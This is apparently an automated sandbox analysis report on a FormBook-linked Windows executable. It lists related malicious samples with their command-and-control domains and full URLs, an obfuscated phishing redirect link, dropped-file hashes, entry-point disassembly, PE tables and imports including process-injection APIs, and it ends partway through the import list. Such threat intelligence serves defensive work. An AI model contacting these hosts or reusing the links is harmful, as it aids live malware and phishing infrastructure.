199.59.243.227 | BkZqIS5vlv.exe | malicious | FormBook | www.deepfy.xyz/jlkn/
199.59.243.227 | FzmC0FwV6y.exe | malicious | FormBook | www.master7.space/0i43/
199.59.243.227 | Shipping documents..exe | malicious | FormBook | www.auto-deals-cz-000.buzz/geci/
199.59.243.227 | icRicpJWczmiOf8.exe | malicious | FormBook | www.lowerbackpain.site/t9om/
199.59.243.227 | IbRV4I7MrS.exe | malicious | FormBook | www.rebel.tienda/7n9v/
199.59.243.227 | NIlfETZ9aE.exe | malicious | FormBook | www.deepfy.xyz/jlkn/
199.59.243.227 | nCYUA8nqsg.exe | malicious | FormBook | www.coworking-jp-aa.click/xa2o/?JB=NJsDlniUbQYDatfhfDHPvwFd/AWSP7AhFfxHSrFrjljMI6G4ERIdsA2z0osvS6jhoZboHyHHqbRD6RaIDTbJ7qLt4qENU/l5boxOGvM5d+51kNkCDA==&3B6=Cv40V
199.59.243.227 | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | malicious | FormBook | www.adsdomain-195.click/q3rc/
199.59.243.227 | debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe | malicious | FormBook | www.deepfy.xyz/0zsv/
199.59.243.227 | PI916810.exe | malicious | FormBook | www.9net88.net/ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.pluribiz.life | MV Sunshine.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | #10302024.exe | malicious | FormBook | 209.74.64.58
webredir.vip.gandi.net | SWIFT.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | #10302024.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | rPO-000172483.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO-000041522.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | Doc 784-01965670.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | rDebitadvice22_10_2024.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO#071024.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO#001498.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | CENA.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | foljNJ4bug.exe | malicious | FormBook | 217.70.184.50
www.migraine-massages.pro | SWIFT.exe | malicious | FormBook | 199.59.243.227
www.migraine-massages.pro | #10302024.exe | malicious | FormBook | 199.59.243.227
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        INFOMANIAK-ASCHhttps://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                        • 128.65.195.91
                                                                                        https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                        • 128.65.195.91
                                                                                        z95ordemdecomprapdfx4672xx.exeGet hashmaliciousFormBookBrowse
                                                                                        • 84.16.66.164
                                                                                        Doc.exeGet hashmaliciousSliverBrowse
                                                                                        • 128.65.199.135
                                                                                        Nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 84.16.66.164
                                                                                        TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                        • 128.65.195.180
                                                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                        • 84.16.66.164
                                                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                                                        • 84.16.66.164
                                                                                        xP1455Elxv.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 185.176.232.182
                                                                                        https://i.printboxalgerie.com/chsbb/ch/Get hashmaliciousUnknownBrowse
                                                                                        • 185.125.25.41
                                                                                        BODIS-NJUSBkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        nCYUA8nqsg.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://media.nomadsport.net/Culture/SetCulture?culture=en&returnUrl=https://t.ly/qrCwtGet hashmaliciousUnknownBrowse
                                                                                        • 47.253.61.56
                                                                                        http://bankllist.usGet hashmaliciousUnknownBrowse
                                                                                        • 47.253.61.56
                                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                        • 8.210.3.99
                                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                        • 8.217.17.192
En88bvC0fc.exe: malicious (FormBook)
• 8.210.49.139
mBms4I508x.exe: malicious (FormBook)
• 47.242.252.174
arm.elf: malicious (Mirai, Gafgyt)
• 47.251.12.143
sh4.elf: malicious (Mirai, Gafgyt)
• 8.212.58.110
https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVr: malicious (HTMLPhisher, Mamba2FA)
• 47.251.66.114
QH6Ue0xtNZ.exe: malicious (Metasploit, Meterpreter)
• 8.218.85.22
LEASEWEB-UK-LON-11GB
SecuriteInfo.com.FileRepMalware.27261.32754.exe: malicious (Unknown)
• 23.106.59.52
SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elf: malicious (Mirai)
• 95.168.183.162
SecuriteInfo.com.FileRepMalware.15071.2577.exe: malicious (Unknown)
• 23.106.59.18
5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exe: malicious (Unknown)
• 23.106.59.52
F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exe: malicious (Unknown)
• 23.106.59.52
d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe: malicious (Unknown)
• 23.106.59.52
d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe: malicious (Unknown)
• 23.106.59.52
69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exe: malicious (Unknown)
• 23.106.59.52
69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exe: malicious (Unknown)
• 23.106.59.52
w1J9KDIC0m.exe: malicious (Unknown)
• 23.106.59.52
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288768
                                                                                        Entropy (8bit):7.992758448095575
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:RcaESRoMY/wMqPfKNEmrDnPx59PL5U3KkOE5yr5b8r0Agn:RXESEYpPS+mrDPD9P+6E5dw
                                                                                        MD5:88E0FEBCEC4114CC07AF5A64B5DF726A
                                                                                        SHA1:6FAEBFD1D2014326AE99059647A3271CAC757602
                                                                                        SHA-256:55AE03B200D59BFA0A36F83BAFB1C13FDDACC1688FE766366648755A2F89F0A9
                                                                                        SHA-512:E2AACF503C4E6EB673DD42B2F42AF9585F0B8041758D5C4CDEE07EBE90AED1281882DC2B231644994F7C5E995DEAA96414DEC590F094777F8039DAD6434AC45B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:y....I9OXn..A...s.67..cJ1...4QHVKI9OX64QHVKI9OX64QHVKI9OX6.QHVEV.AX.=.i.J..n.^]"h&9&^=9[.2)8%&Mo:S.#=8k Wo.ygq%9/,.BU<.QHVKI9O!7=.u6,../?..1/.Q.bVS.R.../?....w)^.._W9u6,.9OX64QHV..9O.75QA.F.9OX64QHV.I;NS7?QH.OI9OX64QHV.]9OX&4QH&OI9O.64AHVKK9O^64QHVKI?OX64QHVK9=OX44QHVKI;O..4QXVKY9OX6$QHFKI9OX6$QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64Qf".1MOX6..LVKY9OX`0QHFKI9OX64QHVKI9Ox641HVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX64QHVKI9OX6
                                                                                        Process:C:\Windows\SysWOW64\net.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.1209886597424439
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.513742342703609
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                        • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:XhAQ0Rk63O.exe
                                                                                        File size:1'330'101 bytes
                                                                                        MD5:1641128999c6968823ca0d92cb8f0ece
                                                                                        SHA1:eb766aacb3c3ee714f728dcddd4ac02168c1225e
                                                                                        SHA256:b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d
                                                                                        SHA512:fcacf0592eeb1cc29e18c41c7762557aa1fa72993a59ca78c033ed6f1e6448bbaf6a6aaa8a1b6644cf42838fc051ceee52ee5fd584e79d82b9cba9d6d48aea0a
                                                                                        SSDEEP:24576:ffmMv6Ckr7Mny5QLUwz9mShS6PrpFjkfmw+N+pa7IwPv:f3v+7/5QLpzPhVrpFjkfSN2if
                                                                                        TLSH:D455F112B7D680B6D9A338B5297BE32BEB3575190327C48BA7E01F779F211409B36361
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                        Icon Hash:1733312925935517
                                                                                        Entrypoint:0x416310
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:0
                                                                                        File Version Major:5
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                        Instruction
                                                                                        call 00007FA488E4556Ch
                                                                                        jmp 00007FA488E3933Eh
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push edi
                                                                                        push esi
                                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                        mov edi, dword ptr [ebp+08h]
                                                                                        mov eax, ecx
                                                                                        mov edx, ecx
                                                                                        add eax, esi
                                                                                        cmp edi, esi
                                                                                        jbe 00007FA488E394CAh
                                                                                        cmp edi, eax
                                                                                        jc 00007FA488E3966Ah
                                                                                        cmp ecx, 00000100h
                                                                                        jc 00007FA488E394E1h
                                                                                        cmp dword ptr [004A94E0h], 00000000h
                                                                                        je 00007FA488E394D8h
                                                                                        push edi
                                                                                        push esi
                                                                                        and edi, 0Fh
                                                                                        and esi, 0Fh
                                                                                        cmp edi, esi
                                                                                        pop esi
                                                                                        pop edi
                                                                                        jne 00007FA488E394CAh
                                                                                        pop esi
                                                                                        pop edi
                                                                                        pop ebp
                                                                                        jmp 00007FA488E3992Ah
                                                                                        test edi, 00000003h
                                                                                        jne 00007FA488E394D7h
                                                                                        shr ecx, 02h
                                                                                        and edx, 03h
                                                                                        cmp ecx, 08h
                                                                                        jc 00007FA488E394ECh
                                                                                        rep movsd
                                                                                        jmp dword ptr [00416494h+edx*4]
                                                                                        nop
                                                                                        mov eax, edi
                                                                                        mov edx, 00000003h
                                                                                        sub ecx, 04h
                                                                                        jc 00007FA488E394CEh
                                                                                        and eax, 03h
                                                                                        add ecx, eax
                                                                                        jmp dword ptr [004163A8h+eax*4]
                                                                                        jmp dword ptr [004164A4h+ecx*4]
                                                                                        nop
                                                                                        jmp dword ptr [00416428h+ecx*4]
                                                                                        nop
                                                                                        mov eax, E4004163h
                                                                                        arpl word ptr [ecx+00h], ax
                                                                                        or byte ptr [ecx+eax*2+00h], ah
                                                                                        and edx, ecx
                                                                                        mov al, byte ptr [esi]
                                                                                        mov byte ptr [edi], al
                                                                                        mov al, byte ptr [esi+01h]
                                                                                        mov byte ptr [edi+01h], al
                                                                                        mov al, byte ptr [esi+02h]
                                                                                        shr ecx, 02h
                                                                                        mov byte ptr [edi+02h], al
                                                                                        add esi, 03h
                                                                                        add edi, 03h
                                                                                        cmp ecx, 08h
                                                                                        jc 00007FA488E3948Eh
                                                                                        Programming Language:
                                                                                        • [ASM] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [C++] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2005 build 50727
                                                                                        • [IMP] VS2005 build 50727
                                                                                        • [ASM] VS2008 build 21022
                                                                                        • [RES] VS2008 build 21022
                                                                                        • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, 